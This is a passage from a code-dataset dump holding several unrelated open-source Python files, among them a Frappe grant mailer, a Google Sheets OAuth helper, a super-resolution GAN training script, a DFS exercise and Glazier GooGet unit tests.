{0}'.format(grant.applicant_name),\n\t\tmessage='

Please Review this grant application


' + url,\n\t\treference_doctype=grant.doctype,\n\t\treference_name=grant.name\n\t)\n\n\tgrant.status = 'In Progress'\n\tgrant.email_notification_sent = 1\n\tgrant.save()\n\tfrappe.db.commit()\n\n\tfrappe.msgprint(_(\"Review Invitation Sent\"))\n","repo_name":"frappe/non_profit","sub_path":"non_profit/non_profit/doctype/grant_application/grant_application.py","file_name":"grant_application.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"2927060036","text":"import json\nfrom sys import flags\n\nimport httplib2\n\nimport os\nfrom apiclient import discovery\n# noinspection PyUnresolvedReferences\nfrom apiclient.errors import HttpError\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\n\nimport Options\n\n\ndef get_credentials():\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'sheets.googleapis.com-python-quickstart.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, tools.argparser.parse_args([]))\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n\n\ndef getFileList():\n global FILES\n folder = Options.get_indiv_folder()\n print(folder)\n query = \"'{0}' in parents and mimeType='application/vnd.google-apps.spreadsheet'\".format(folder)\n results = DRIVE_SERVICE.files().list(q=query, fields='files(id, name)', orderBy='name', pageSize=1000).execute()\n FILES = results.get('files', [])\n if not FILES:\n print('No individual files found')\n else:\n print(\"{0} individual files found\".format((len(FILES))))\n\nSCOPES = 'https://www.googleapis.com/auth/drive ' + 'https://www.googleapis.com/auth/spreadsheets'\nCLIENT_SECRET_FILE = './Resources/client_secret.json'\nAPPLICATION_NAME = 'THONvelope Helper API'\n\nFILES = []\n\ncredentials = get_credentials()\nhttp = credentials.authorize(httplib2.Http())\nDRIVE_SERVICE = discovery.build('drive', 'v3', http=http)\ngetFileList()\n\ndiscoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n 'version=v4')\nSHEET_SERVICE = discovery.build('sheets', 'v4', http=http,\n discoveryServiceUrl=discoveryUrl)\n\n","repo_name":"SpringfieldFTK/THONvelopes-Tool","sub_path":"Requests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26039959678","text":"\"\"\"Define different types of media.\n\nCurrently, the only media defined is \"movie.\" However,\nmedia could also include, for example, music or books.\n\"\"\"\n\nclass Movie():\n \"\"\"A representation of a movie.\n\n The object is a container for information related to a specific movie.\n \"\"\" \n def __init__(self, movie_title, movie_storyline, poster_image,\n trailer_youtube, IMDB_url):\n \"\"\"Initialize a Movie object.\n\n Keyword arguments:\n movie_title -- the title of the movie\n movie_storyline -- a short description of the movie's plot\n poster_image -- a url to a poster image of the movie\n trailer_youtube -- a url to a YouTube trailer for the movie\n IMDB_url -- a url to the IMDB entry for the movie\n \"\"\"\n self.title = movie_title\n self.storyline = movie_storyline\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n self.IMDB_url = IMDB_url\n","repo_name":"ryanwc/MoviesWebsite","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72487732306","text":"import os\nfrom collections import defaultdict\nfrom typing import Sequence\n\nimport pandas as pd\nimport regex as re\n\nfrom models.article import Article\nfrom tools.src.annotations import Annotations\nfrom tools.src.annotation import Annotation\n\n\nclass ArticlesLoader:\n \"\"\" A simple class that loads the article files in a provided directory as\n articles.\n\n The articles are provided by the workshop organizers in separate files in a\n directory. Each article consists of title and content sentences written\n separately on new lines (each). The name of the file contains the id of the\n article.\n\n \"\"\"\n\n def __init__(self, data_dir,\n article_file_id_pattern,\n article_label_pattern_slc, article_label_pattern_flc,\n labels_dir_slc=None, labels_dir_flc=None):\n\n self.data_dir = data_dir\n self.labels_dir_slc = labels_dir_slc\n self.labels_dir_flc = labels_dir_flc\n self.article_file_id_pattern = article_file_id_pattern\n self.article_label_pattern_slc = article_label_pattern_slc\n self.article_label_pattern_flc = article_label_pattern_flc\n\n def load_data(self) -> Sequence[Article]:\n \"\"\" Loads all the articles from the files in the provided directory.\n\n Returns a list of Article objects\n \"\"\"\n article_files = os.listdir(self.data_dir)\n articles = [self.__map_to_article(os.path.join(self.data_dir, article))\n for article in article_files]\n\n load_slc_labels: bool = self.labels_dir_slc is not None\n load_flc_labels: bool = self.labels_dir_flc is not None\n\n if load_slc_labels:\n for article in articles:\n self.__load_slc_labels(article)\n\n if load_flc_labels:\n for article in articles:\n self.__load_flc_labels(article)\n\n print(\"{} articles loaded\".format(len(articles)))\n return articles\n\n def __map_to_article(self, file_path) -> Article:\n \"\"\"Helper method that constructs an Article object from an article\n file\"\"\"\n with open(file_path) as file:\n article_id = re \\\n .search(self.article_file_id_pattern, file.name, 0) \\\n .group(1)\n content = file.readlines()\n return Article(article_id, content)\n\n def __load_slc_labels(self, article: Article):\n file_name = os.path.join(self.labels_dir_slc,\n self.article_label_pattern_slc\n .format(article.article_id))\n\n with open(file_name, mode=\"r\") as file:\n slc_labels = pd.read_csv(file, sep=\"\\t\", names=[\"article_id\",\n \"sentence_id\",\n \"technique\"])\n article.slc_labels = slc_labels.technique.values\n\n def __load_flc_labels(self, article: Article):\n article_id = article.article_id\n # print(\"Loading flc annotations for {}\".format(article_id))\n\n file_name = os.path.join(self.labels_dir_flc,\n self.article_label_pattern_flc\n .format(article_id))\n\n article_annotations = Annotations()\n article_annotations.load_annotation_list_from_file(file_name)\n\n if article_annotations.has_article(article_id):\n annotations = article_annotations.get_article_annotations(article_id)\n spans = annotations.get_article_annotations()\n else:\n spans = []\n\n # convert the article annotations to sentence annotations\n sentence_annotations = self.__convert_annotations(article, spans)\n article.set_flc_annotations(sentence_annotations)\n\n @staticmethod\n def __convert_annotations(article, spans):\n \"\"\"\n Converts an article-based annotation to an annotation inside a sentence\n :param article:\n :param spans: list of article-wide spans. E.g. each span start and end\n position is based on the article length, across sentences.\n :return: list of spans covering the sentences of the article. Each entry\n in the list is a bound inside a sentence.\n \"\"\"\n article_text = \"\".join(article.article_sentences)\n article_annotations = []\n\n for i, sent in enumerate(article.article_sentences):\n sent_start = article_text.find(sent)\n assert sent_start != -1\n\n sentence_annotations = []\n sent_end = sent_start + len(sent)\n for span in spans:\n span_start = span.get_start_offset()\n span_end = span.get_end_offset()\n\n span_starts_in_sentence = sent_start <= span_start < sent_end\n span_ends_in_sentence = span_start < sent_start < span_end <= sent_end\n\n if span_starts_in_sentence:\n sentence_annotation_start = span_start - sent_start\n sentence_annotation_end = min(sent_end, span_end) - sent_start\n sentence_annotation = Annotation(span.get_label(),\n sentence_annotation_start,\n sentence_annotation_end)\n sentence_annotations.append(sentence_annotation)\n assert sentence_annotation_start <= sentence_annotation_end\n elif span_ends_in_sentence:\n sentence_annotation_start = 0\n sentence_annotation_end = min(sent_end, span_end) - sent_start\n sentence_annotation = Annotation(span.get_label(),\n sentence_annotation_start,\n sentence_annotation_end)\n sentence_annotations.append(sentence_annotation)\n assert sentence_annotation_start <= sentence_annotation_end\n\n article_annotations.append(sentence_annotations)\n\n return article_annotations\n","repo_name":"freespirit/propaganda-NLP4IF-2019","sub_path":"models/articles_loader.py","file_name":"articles_loader.py","file_ext":"py","file_size_in_byte":6111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2529870924","text":"\r\nfrom asyncio import current_task\r\n\r\n\r\ng1 = {'S' :['D','E','P'],\r\n'A': ['B', 'C'],\r\n'C': ['A', 'D', 'F'],\r\n'D': ['B', 'C', 'E', 'S'], \r\n'B': ['A', 'D'], \r\n'G': ['F'], \r\n'E': ['D', 'H', 'R', 'S'], \r\n'F': ['C', 'G', 'R'], \r\n'H': ['E', 'P', 'Q'], \r\n'P': ['H', 'Q', 'S'],\r\n'Q': ['H', 'P'], \r\n'R': ['E', 'F']\r\n}\r\nvisited ={'A':0,'B':0,'C':0,'D':0,'E':0,'F':0,'G':0,'H':0,'P':0,'Q':0,'R':0,'S':0}\r\nans=[]\r\nstack_dfs =[]\r\nstack_dfs.append(list(g1.keys())[0])# Let get first element for our graph 1\r\ntemp_str =\"\"\r\ncurrent_stack=\"\"\r\nwhile stack_dfs and temp_str!='G':# we make sure our stack is not empty and not 'G' our target find Goal \r\n print(stack_dfs)\r\n current_stack=stack_dfs.pop()\r\n temp_str=current_stack[-1]#Let pop element from top of the stack\r\n if(visited[temp_str]==0):# make that element is not visited yet\r\n ans.append(temp_str)# add it to our node we visited\r\n visited[temp_str]=1# change it 1 to mark visited\r\n # if(temp_str=='G'):\r\n # break\r\n for x in reversed(g1[temp_str]):# Let access adjacent node from back of the list meaning from farthest right (Deepest ) \r\n # if x not in stack_dfs:\r\n new_stack = list(current_stack)\r\n new_stack.append(x)\r\n stack_dfs.append(new_stack) # let push that Node at bottom of our stack, So we can pop the Left most node first \r\n \r\n# print(ans)\r\n# For Printing Purpose \r\nans_str =\"DFS stacks: \"\r\nfor x in ans:\r\n ans_str=ans_str+x+\" \"\r\nprint(ans_str)\r\nans_str=\"DFS PATH: \"\r\nfor x in current_stack:\r\n ans_str=ans_str+x+\" \"\r\nprint(ans_str) ","repo_name":"Srujan560/ICSI-535","sub_path":"DFS_Undirected graph_unweighted_stack.py","file_name":"DFS_Undirected graph_unweighted_stack.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32113901732","text":"import simple_matrix_pb2\nimport struct\ns = simple_matrix_pb2.SimpleMatrix()\ns.id = \"name\"\ns.device_id = \"device_id\"\ns.num_cols = 2\ns.data_type=5\ns.payload.append(struct.pack('dd',1.0,3.14159))\nf = open('simplematrix.bin','w')\nf.write(s.SerializeToString())\nf.close()\n","repo_name":"hello/kuria","sub_path":"haltija/unit-test/test-data/make_simple_matrix.py","file_name":"make_simple_matrix.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4436365304","text":"import os, argparse, sys, shutil, warnings, glob\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom math import log2, log10\nimport pandas as pd\nimport numpy as np\nfrom collections import OrderedDict\n\nfrom torchvision import transforms, utils\nimport torchvision\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nimport torch.optim.lr_scheduler as lr_scheduler\n\nfrom skimage import exposure, color, io, img_as_float, img_as_ubyte\nfrom skimage.util import view_as_windows, pad, montage\nfrom PIL import Image, ImageFilter\nimport imagej\n\nimport data_loader as data\nimport models\n\nimport pytorch_fid.fid_score as fid_score\n\n\ndef new_compress_curriculum(args, cur_factor, csv='train', stc=False):\n transformed_dataset = data.Compress_Dataset(csv_file=data.compress_csv_path(csv, args.dataset),\n transform=data.Compose([\n transforms.RandomCrop((args.patch_size, args.patch_size)),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n data.Rescale((args.patch_size, args.patch_size), up_factor=cur_factor, stc=stc), \n data.ToTensor()\n ]))\n dataloader = DataLoader(transformed_dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers)\n return dataloader\n\ndef train(args, epoch, run, dataloader, generator, discriminator, optimizer_G, optimizer_D, criterionL, criterionMSE, Tensor=None, device='cuda:0', patch=None):\n l = args.percep_weight\n if args.gan == 0:\n gan = False\n else:\n gan = True\n epoch_loss = 0\n gan_loss = 0\n total_loss = 0\n dis_loss = 0\n generator.train()\n for iteration, batch in enumerate(dataloader):\n real_mid = Variable(batch['input'].type(Tensor).to(device), requires_grad=False)\n real_high = Variable(batch['output'].type(Tensor).to(device), requires_grad=False) \n # Adversarial ground truths\n valid = Variable(Tensor(np.ones((real_mid.size(0), *patch))).to(device), requires_grad=False)\n fake = Variable(Tensor(np.zeros((real_mid.size(0), *patch))).to(device), requires_grad=False) \n #---------------\n # Train Generator\n #--------------- \n optimizer_G.zero_grad() \n # GAN loss\n fake_high = generator(real_mid)\n if gan:\n pred_fake = discriminator(fake_high, real_mid)\n loss_GAN = criterionMSE(pred_fake, valid)\n \n # Identity\n lossL1 = criterionL(fake_high, real_high) \n loss_pixel = lossL1 \n # Total loss\n if gan:\n loss_G = l * loss_GAN + (1-l) * loss_pixel \n loss_G.backward()\n total_loss = total_loss + loss_G.item()\n gan_loss = gan_loss + loss_GAN.item()\n else:\n loss_pixel.backward()\n optimizer_G.step() \n #---------------\n # Train Discriminator\n #--------------- \n if gan and iteration % args.num_critic == 0:\n optimizer_D.zero_grad() \n # Real loss\n pred_real = discriminator(real_high, real_mid)\n loss_real = criterionMSE(pred_real, valid) \n # Fake loss\n pred_fake = discriminator(fake_high.detach(), real_mid)\n loss_fake = criterionMSE(pred_fake, fake)\n # Total loss\n loss_D = 0.5 * (loss_real + loss_fake)\n loss_D.backward()\n optimizer_D.step()\n dis_loss = dis_loss + loss_D.item() \n epoch_loss = epoch_loss + loss_pixel.item() \n if gan:\n sys.stdout.write('\\r[%d/%d][%d/%d] Discriminator_Loss: %.4f Generator_Loss (Identity/Advers/Total): %.4f/%.4f/%.4f' \n % (epoch, args.num_epochs, iteration, len(dataloader), loss_D.item(), \n loss_pixel.item(), loss_GAN.item(), loss_G.item()))\n else:\n sys.stdout.write('\\r[%d/%d][%d/%d] Generator_L1_Loss: %.4f' \n % (epoch, args.num_epochs, iteration, len(dataloader), loss_pixel.item()))\n print(\"\\n ===> Epoch {} Complete: Avg. Loss: {:.4f}\".format(epoch, epoch_loss / len(dataloader))) \n g_path = os.path.join('weights', run, 'generator.pth')\n d_path = os.path.join('weights', run, 'discriminator.pth')\n os.makedirs(os.path.join('weights', run), exist_ok=True)\n torch.save(generator.state_dict(), g_path)\n if gan:\n os.makedirs(os.path.join('weights', run), exist_ok=True)\n torch.save(discriminator.state_dict(), d_path)\n\ndef test(args, generator, test_csv, stitching=False):\n try:\n shutil.rmtree('output')\n except:\n pass\n os.makedirs('output', exist_ok=True)\n os.makedirs('output/lr', exist_ok=True)\n os.makedirs('output/hr', exist_ok=True)\n os.makedirs('output/sr', exist_ok=True)\n os.makedirs('output/temp_patch', exist_ok=True)\n os.makedirs('output/temp_patch_target', exist_ok=True)\n os.makedirs('output/temp_channel', exist_ok=True)\n step = 192\n test_files = pd.read_csv(test_csv)\n avg_fid = 0\n avg_psnr = 0\n for k in range(len(test_files)):\n img = Image.open(test_files.iloc[k, 0])\n img_hr_array = img_as_float(np.array(img))\n img_lr = img.resize((int(img.size[1]/args.up_scale), int(img.size[0]/args.up_scale)))\n img_lr = img_lr.resize(img.size, Image.BILINEAR)\n img_lr = img_lr.filter(ImageFilter.GaussianBlur(radius=((args.up_scale-1)/2)))\n img_lr_array = img_as_float(np.array(img_lr))\n pad_h = int((np.floor(img_lr_array.shape[0]/step) * step + args.patch_size) - img_lr_array.shape[0])\n pad_w = int((np.floor(img_lr_array.shape[1]/step) * step + args.patch_size) - img_lr_array.shape[1])\n img_lr_array_padded = pad(img_lr_array, ((0, pad_h), (0, pad_w), (0, 0)), mode='reflect')\n img_lr_wd = view_as_windows(img_lr_array_padded, (args.patch_size, args.patch_size, 3), step=step)\n img_lr_wd = np.squeeze(img_lr_wd)\n img_hr_array_padded = pad(img_hr_array, ((0, pad_h), (0, pad_w), (0, 0)), mode='reflect')\n img_hr_wd = view_as_windows(img_hr_array_padded, (args.patch_size, args.patch_size, 3), step=step)\n img_hr_wd = np.squeeze(img_hr_wd) \n with open('output/temp_patch/TileConfiguration.txt', 'w') as text_file:\n print('dim = {}'.format(2), file=text_file)\n with torch.no_grad():\n generator.eval()\n for i in range (0, img_lr_wd.shape[1]):\n for j in range (0, img_lr_wd.shape[0]):\n target = img_hr_wd[j, i]\n patch = img_lr_wd[j, i].transpose((2, 0, 1))[None, :]\n patch_tensor = torch.from_numpy(patch).float().cuda()\n prediction = generator(patch_tensor)\n io.imsave('output/temp_patch/{}_{}.tiff'.format(j, i), img_as_ubyte(np.clip(prediction.cpu().numpy()[0], 0, 1)))\n io.imsave('output/temp_patch_target/{}_{}.tiff'.format(j, i), img_as_ubyte(target))\n print('{}_{}.tiff; ; ({}, {})'.format(j, i, i*step, j*step), file=text_file)\n fid = fid_score.calculate_fid_given_paths(('output/temp_patch', 'output/temp_patch_target'), 8, 'cuda:0', 2048)\n avg_fid = avg_fid + fid\n if stitching:\n sys.stdout.write('\\r{}/{} stitching, please wait...'.format(k+1, len(test_files))) \n params = {'type': 'Positions from file', 'order': 'Defined by TileConfiguration', \n 'directory':'output/temp_patch', 'ayout_file': 'TileConfiguration.txt', \n 'fusion_method': 'Linear Blending', 'regression_threshold': '0.30', \n 'max/avg_displacement_threshold':'2.50', 'absolute_displacement_threshold': '3.50', \n 'compute_overlap':False, 'computation_parameters': 'Save computation time (but use more RAM)', \n 'image_output': 'Write to disk', 'output_directory': 'output/temp_channel'}\n plugin = \"Grid/Collection stitching\"\n ij.py.run_plugin(plugin, params)\n list_channels = [f for f in os.listdir('output/temp_channel')]\n c1 = io.imread(os.path.join('output/temp_channel', list_channels[0]))\n c2 = io.imread(os.path.join('output/temp_channel', list_channels[1]))\n c3 = io.imread(os.path.join('output/temp_channel', list_channels[2]))\n c1 = c1[:img.size[1], :img.size[0]]\n c2 = c2[:img.size[1], :img.size[0]]\n c3 = c3[:img.size[1], :img.size[0]]\n img_to_save = np.clip(np.stack((c1, c2, c3)).transpose((1, 2, 0)), 0, 1)\n io.imsave(os.path.join('output/sr', os.path.basename(test_files.iloc[k, 0]).replace('.jpg', '.tiff')), img_as_ubyte(img_to_save))\n io.imsave(os.path.join('output/lr', os.path.basename(test_files.iloc[k, 0]).replace('.jpg', '.tiff')), img_as_ubyte(img_lr_array))\n io.imsave(os.path.join('output/hr', os.path.basename(test_files.iloc[k, 0]).replace('.jpg', '.tiff')), img_as_ubyte(img))\n else:\n psnr = p_snr('output/temp_patch', 'output/temp_patch_target')\n avg_psnr = avg_psnr + psnr\n if stitching:\n psnr = p_snr('output/sr', 'output/hr')\n else:\n psnr = avg_psnr / len(test_files)\n fid = avg_fid / len(test_files)\n return fid, psnr\n\ndef p_snr(path_input, path_ref):\n MSE = nn.MSELoss()\n imgs_input = glob.glob(os.path.join(path_input, '*.tiff'))\n imgs_ref = glob.glob(os.path.join(path_ref, '*.tiff'))\n ave_psnr = 0\n for i in range(len(imgs_input)):\n img_input = torch.from_numpy(img_as_float(io.imread(imgs_input[i]).transpose(2, 1, 0))) \n img_ref = torch.from_numpy(img_as_float(io.imread(imgs_ref[i]).transpose(2, 1, 0)))\n img_input = img_input[None, :]\n img_ref = img_ref[None, :] \n mse = MSE(img_input, img_ref) \n psnr = 10 * log10(1 / mse.item())\n ave_psnr += psnr\n ave_psnr = ave_psnr / len(imgs_input)\n return ave_psnr\n\ndef print_output(generator, dataloader_valid, device='cuda:0'):\n os.makedirs('output/print', exist_ok=True)\n os.makedirs('output/print/lr', exist_ok=True)\n os.makedirs('output/print/hr', exist_ok=True)\n os.makedirs('output/print/sr', exist_ok=True)\n with torch.no_grad(): \n generator.eval()\n print(\"===> 8x: printing sampled patches\")\n for iteration, batch in enumerate(dataloader_valid): \n input, target = batch['input'].to(device), batch['output'].to(device)\n imgs_input =input.float().to(device)\n prediction = generator(imgs_input)\n target = target.float()\n for i in range(target.shape[0]):\n utils.save_image(imgs_input[i], 'output/print/lr/{}.tiff'.format(i))\n utils.save_image(target[i], 'output/print/hr/{}.tiff'.format(i))\n utils.save_image(prediction[i], 'output/print/sr/{}.tiff'.format(i))\n break \n\ndef main():\n parser = argparse.ArgumentParser(description='Train WSISR on compressed TMA dataset')\n parser.add_argument('--batch-size', default=32, type=int, help='Batch size')\n parser.add_argument('--patch-size', default=224, type=int, help='Patch size')\n parser.add_argument('--up-scale', default=5, type=float, help='Targeted upscale factor')\n parser.add_argument('--num-workers', default=4, type=int, help='Number of workers')\n parser.add_argument('--num-epochs', default=900, type=int, help='Number of epochs, more epochs are desired for GAN training')\n parser.add_argument('--g-lr', default=0.0001, type=float, help='Learning rate of the generator')\n parser.add_argument('--d-lr', default=0.00001, type=float, help='Learning rate of the descriminator')\n parser.add_argument('--percep-weight', default=0.01, type=float, help='GAN loss weight')\n parser.add_argument('--run-from', default=None, type=str, help='Load weights from a previous run, use folder name in [weights] folder')\n parser.add_argument('--start-epoch', default=1, type=int, help='Starting epoch for the curriculum, start at 1/2 of the epochs to skip the curriculum')\n parser.add_argument('--gan', default=1, type=int, help='Use GAN')\n parser.add_argument('--num-critic', default=1, type=int, help='Iteration interval for training the descriminator') \n parser.add_argument('--test-interval', default=50, type=int, help='Epoch interval for FID score testing')\n parser.add_argument('--print-interval', default=10, type=int, help='Epoch interval for output printing') \n parser.add_argument('--dataset', default='TMA', type=str, help='Dataset folder name')\n args = parser.parse_args()\n warnings.filterwarnings('ignore')\n device = torch.device('cuda:0')\n tensor = torch.cuda.FloatTensor\n data.generate_compress_csv()\n valid_dataset = new_compress_curriculum(args, args.up_scale, 'valid')\n generator = models.Generator()\n generator.to(device);\n discriminator = models.Discriminator()\n discriminator.to(device);\n criterionL = nn.L1Loss().cuda()\n criterionMSE = nn.MSELoss().cuda()\n optimizer_G = torch.optim.Adam(generator.parameters(), lr=args.g_lr)\n optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=args.d_lr)\n patch = (1, args.patch_size // 2 ** 4, args.patch_size // 2 ** 4)\n if args.run_from is not None:\n generator.load_state_dict(torch.load(os.path.join('weights', args.run_from, 'generator.pth')))\n try:\n discriminator.load_state_dict(torch.load(os.path.join('weights', args.run_from, 'discriminator.pth')))\n except:\n print('Discriminator weights not found!')\n pass\n optimizer_G = torch.optim.Adam(generator.parameters(), lr=args.g_lr)\n optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=args.d_lr)\n scheduler_G = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer_G, args.num_epochs, args.g_lr*0.05)\n scheduler_D = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer_D, args.num_epochs, args.d_lr*0.05)\n run = datetime.now().strftime(\"%Y-%m-%d--%H-%M-%S\")\n cur_length = int(0.5*args.num_epochs)\n init_scale = 2**2\n step_size = (2**args.up_scale-init_scale) / cur_length\n print('loading ImageJ, please wait')\n ij = imagej.init('fiji/fiji/Fiji.app/')\n for epoch in range(args.start_epoch, args.num_epochs):\n factor = min(log2(init_scale+(epoch-1)*step_size), args.up_scale)\n print('curriculum updated: {} '.format(factor))\n train_dataset = new_compress_curriculum(args, factor, 'train', stc=True)\n train(args, epoch, run, train_dataset, generator, discriminator, optimizer_G, optimizer_D, criterionL, criterionMSE, tensor, device, patch)\n scheduler_G.step()\n scheduler_D.step()\n if epoch % args.test_interval == 0:\n fid, psnr = test(args, generator, data.compress_csv_path('valid', args.dataset))\n print('\\r>>>> PSNR: {}, FID: {}'.format(psnr, fid))\n if epoch % args.print_interval == 0:\n print_output(generator, valid_dataset, device)\n test(args, generator, data.compress_csv_path('test', args.dataset), stitching=True)\n \nif __name__ == '__main__':\n main()\n\n","repo_name":"uw-loci/demo_wsi_superres","sub_path":"train_compress.py","file_name":"train_compress.py","file_ext":"py","file_size_in_byte":15752,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"25689358529","text":"import pygame\nfrom scipy.ndimage.filters import *\n\n\nclass GaussianBlur:\n '''\n 화면에 가우시안 블러 효과를 넣는 클래스\n '''\n def __init__(self, kernelsize=7):\n self.kernel_size = kernelsize\n\n def filter(self, srfc, xpos, ypos, width, height):\n '''\n 가우시안 블러를 만드는 함수\n\n :param srfc: 가우시안 블러 효과를 적용 할 화면\n :type srfc: pygame.Surface\n :param xpos: 필터 가로 시작 위치\n :type xpos: int\n :param ypos: 필터 세로 시작 위치\n :type ypos: int\n :param width: 필터 너비\n :type width: int\n :param height: 필터 높이\n :type height: int\n :return: 가우시안 블러\n :rtype: pygame.Surface\n '''\n nSrfc = pygame.Surface((width, height))\n pxa = pygame.surfarray.array3d(srfc)\n blurred = gaussian_filter(pxa, sigma=(self.kernel_size, self.kernel_size, 0))\n pygame.surfarray.blit_array(nSrfc, blurred)\n del pxa\n return nSrfc\n","repo_name":"2021HYUopensource/super-mario-python","sub_path":"classes/GaussianBlur.py","file_name":"GaussianBlur.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"13610830821","text":"import os\nimport time\nfrom unittest import mock\n\nfrom absl.testing import absltest\n\nfrom glazier.lib import buildinfo\nfrom glazier.lib import constants\nfrom glazier.lib import googet\nfrom glazier.lib import test_utils\n\n\nclass GooGetTest(test_utils.GlazierTestCase):\n\n def setUp(self):\n super(GooGetTest, self).setUp()\n self.install = googet.GooGetInstall()\n self.buildinfo = buildinfo.BuildInfo()\n self.flags = ['whatever', '-reinstall', 'http://example.com/team-%',\n r'http://example.co.uk/secure-%\\%', r'http://%.jp/%\\%']\n\n @mock.patch.object(googet.winpe, 'check_winpe', autospec=True)\n @mock.patch.object(googet.execute, 'execute_binary', autospec=True)\n @mock.patch.object(buildinfo.BuildInfo, 'Branch', autospec=True)\n @mock.patch.object(time, 'sleep', return_value=None)\n def test_launch_goo_get(\n self, unused_sleep, mock_branch, mock_execute_binary, mock_check_winpe):\n\n path = self.create_tempfile(file_path='googet.exe').full_path\n\n temp_dir = os.path.dirname(path)\n self.patch_constant(constants, 'SYS_GOOGETROOT', temp_dir)\n\n pkg = 'test_package_v1'\n retries = 5\n sleep_dur = 30\n mock_branch.return_value = 'example'\n\n # Use hosts paths\n mock_check_winpe.return_value = False\n\n mock_execute_binary.return_value = 0\n\n # Command called successfully\n self.install.LaunchGooGet(\n pkg,\n retries,\n sleep_dur,\n self.buildinfo,\n path=path,\n flags=[('http://example.com/team-unstable, '\n 'http://example.co.uk/secure-unstable, '\n 'https://example.jp/unstable/'), '-reinstall', 'whatever'])\n cmd = [\n '-noconfirm', f'-root={os.path.dirname(path)}', 'install', '-sources',\n ('http://example.com/team-unstable, '\n 'http://example.co.uk/secure-unstable, '\n 'https://example.jp/unstable/'), '-reinstall', 'whatever'\n ]\n cmd.extend([pkg])\n mock_execute_binary.assert_called_with(path, cmd)\n\n # String replacement of sources flag was successful\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path=path, flags=self.flags)\n cmd = [\n '-noconfirm',\n f'-root={os.path.dirname(path)}',\n 'install',\n '-sources',\n ('http://example.com/team-example, '\n 'http://example.co.uk/secure-example%, '\n 'http://example.jp/example%'),\n 'whatever',\n '-reinstall',\n ]\n cmd.extend([pkg])\n mock_execute_binary.assert_called_with(path, cmd)\n\n # Only pkg\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path=None, flags=None)\n cmd = ['-noconfirm', f'-root={constants.SYS_GOOGETROOT}', 'install']\n cmd.extend([pkg])\n mock_execute_binary.assert_called_with(path, cmd)\n\n # No Path\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path=None, flags=self.flags)\n cmd = [\n '-noconfirm', f'-root={constants.SYS_GOOGETROOT}', 'install',\n '-sources',\n ('http://example.com/team-example, '\n 'http://example.co.uk/secure-example%, '\n 'http://example.jp/example%'), 'whatever', '-reinstall'\n ]\n cmd.extend([pkg])\n mock_execute_binary.assert_called_with(path, cmd)\n\n # No flags\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path=path, flags=None)\n cmd = ['-noconfirm', f'-root={constants.SYS_GOOGETROOT}', 'install']\n cmd.extend([pkg])\n mock_execute_binary.assert_called_with(path, cmd)\n\n # Path does not exist\n with self.assertRaisesRegex(\n googet.Error, 'Cannot find path of GooGet binary*'):\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path='C:\\\\abc\\\\def\\\\ghi',\n flags=self.flags)\n\n # Empty Package Name\n with self.assertRaisesRegex(\n googet.Error, 'Missing package name for GooGet install.'):\n self.install.LaunchGooGet(\n '', retries, sleep_dur, self.buildinfo, path=path, flags=self.flags)\n\n # Non zero return value\n mock_execute_binary.side_effect = googet.execute.ExecError('some_command')\n with self.assertRaisesRegex(\n googet.Error,\n 'GooGet command failed after ' + str(retries) + ' attempts'):\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path=path, flags=self.flags)\n\n def test_add_flags(self):\n branch = 'example'\n\n # Character replacement\n result = self.install._AddFlags(self.flags, branch)\n self.assertEqual(result, [\n '-sources',\n (\n 'http://example.com/team-example, '\n 'http://example.co.uk/secure-example%, '\n 'http://example.jp/example%'\n ),\n 'whatever', '-reinstall'\n ])\n\n # Sources were passed as a string\n with self.assertRaisesRegex(\n googet.Error, 'GooGet flags were not passed as a list'):\n self.install._AddFlags('', branch)\n\n # Root flag passed\n with self.assertRaisesRegex(\n googet.Error, 'Root flag detected, remove flag to continue.'):\n self.install._AddFlags(self.flags + ['-root'], branch)\n\n # Sources keyword detected\n with 